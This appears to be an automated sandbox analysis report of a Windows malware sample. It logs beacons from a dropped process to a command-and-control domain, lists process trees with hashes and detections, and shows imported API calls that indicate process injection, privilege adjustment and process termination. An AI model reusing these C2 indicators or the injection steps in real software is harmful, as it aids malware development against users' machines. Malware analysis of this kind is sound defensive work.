                                                                                                                                                                                                            Sep 7, 2024 15:36:24.267636061 CEST169OUTGET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:24.774418116 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:24 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            143192.168.2.361525172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:24.782293081 CEST201OUTGET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:25.284590960 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            144192.168.2.355699172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:26.710438967 CEST169OUTGET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:27.197906017 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            145192.168.2.355700172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:27.220393896 CEST201OUTGET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:27.709809065 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            146192.168.2.355702172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:29.141473055 CEST169OUTGET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:29.634191036 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            147192.168.2.355703172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:29.640697002 CEST201OUTGET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:30.147211075 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            148192.168.2.355705172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:30.288595915 CEST169OUTGET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:30.779432058 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            149192.168.2.355706172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:30.799482107 CEST201OUTGET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:31.312599897 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:09:33:51
                                                                                                                                                                                                            Start date:07/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\5SGOAKv7AR.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\5SGOAKv7AR.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:106'721 bytes
                                                                                                                                                                                                            MD5 hash:36EC3A51B474CF8210BC02444A290499
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:09:33:52
                                                                                                                                                                                                            Start date:07/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\edsuvoov-usum.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:106'721 bytes
                                                                                                                                                                                                            MD5 hash:36EC3A51B474CF8210BC02444A290499
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 84%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:09:33:52
                                                                                                                                                                                                            Start date:07/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:--k33p
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:106'721 bytes
                                                                                                                                                                                                            MD5 hash:36EC3A51B474CF8210BC02444A290499
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:09:33:52
                                                                                                                                                                                                            Start date:07/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:winlogon.exe
                                                                                                                                                                                                            Imagebase:0x7ff61f6c0000
                                                                                                                                                                                                            File size:905'216 bytes
                                                                                                                                                                                                            MD5 hash:B2AD768FF9A9DE3D886825A59DEF307A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:09:33:52
                                                                                                                                                                                                            Start date:07/09/2024
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                            Imagebase:0x7ff7721e0000
                                                                                                                                                                                                            File size:5'311'304 bytes
                                                                                                                                                                                                            MD5 hash:574AF6D80FE7CC6422A8592DE7A39F78
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00403A19 Relevance: 629.5, APIs: 287, Strings: 71, Instructions: 2982registrystringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                                                              • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                                                              • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 00403C23
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtAllocateVirtualMemory), ref: 00403C96
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403CA6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403CB6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403CC6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,?,?,?,?,00000000,NtAllocateVirtualMemory), ref: 00403CE7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 00403D13
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 00403D2E
                                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?), ref: 00403D82
                                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403DEC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(rasapi32.dll,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RasEnumConnectionsA), ref: 00403F01
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00403F34
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetIpAddrTable), ref: 00403F5B
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wininet.dll), ref: 00403FD9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 00404042
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00404052
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 00404062
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetSetOptionA), ref: 00404072
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 00404082
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007C7CF0), ref: 0040445F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(0040F4FC,00000001,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                                                              • GetLastError.KERNEL32(qnd_b__-13,?,?,?,?,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404506
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404532
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040453E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040456E
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,007C7CF0), ref: 004045C1
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                                                              • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(007C7CF1,00001388), ref: 0040468F
